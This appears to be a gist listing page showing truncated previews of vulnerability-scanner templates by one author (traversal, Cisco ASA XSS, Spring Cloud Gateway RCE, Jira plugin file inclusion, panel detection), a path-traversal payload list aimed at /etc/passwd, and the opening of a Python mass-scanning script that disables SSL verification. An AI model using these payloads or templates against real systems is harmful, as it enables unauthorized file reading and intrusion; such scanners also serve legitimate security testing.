This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE_RCE2-1 | |
info: | |
name: CVE_RCE2 | |
author: 0x240x23elu | |
severity: high | |
requests: | |
- payloads: | |
dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/../etc/passwd | |
/../../etc/passwd | |
/../../../etc/passwd | |
/../../../../etc/passwd | |
/../../../../../etc/passwd | |
/../../../../../../etc/passwd | |
/../../../../../../../etc/passwd | |
/../../../../../../../../etc/passwd | |
/..%2fetc/passwd | |
/..%2f..%2fetc/passwd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2020-3580 | |
info: | |
name: xss in cisco ASA | |
author: 0x240x23elu | |
severity: high | |
description: xss in cisco ASA | |
tags: cve,cve2020,cisco | |
requests: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: Synology | |
info: | |
name: Synology | |
author: 0x240x23elu | |
severity: info | |
tags: panel | |
requests: | |
- method: GET |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: spring-cloud | |
info: | |
name: spring-cloud Exposure | |
author: 0x240x23elu | |
severity: info | |
tags: panel,spring-cloud | |
requests: | |
- method: GET |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2022-22947 | |
info: | |
name: CVE-2022-22947 | |
author: 0x240x23elu | |
severity: critical | |
description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) | |
reference: | |
- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 | |
tags: cve,cve2022,rce,spring |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: vmware_Log_Insight | |
info: | |
name: Vmare_Log_Insight | |
author: 0x240x23elu | |
severity: info | |
description: Vmare_Log_Insight_Panel | |
reference: | |
- https:// | |
tags: vmware,Panel |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2023-26255 | |
info: | |
name: Stagil navigation for jira - Local File Inclusion | |
author: 0x240x23elu | |
severity: high | |
description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path | |
reference: | |
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md | |
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ssl | |
from pyhessian.client import HessianProxy as H | |
# Disable SSL certificate verification globally for the Python process | |
ssl._create_default_https_context = ssl._create_unverified_context | |
# Read the list of URLs from the file | |
url_list = open('final.txt').readlines() | |
for url1 in url_list: |
OlderNewer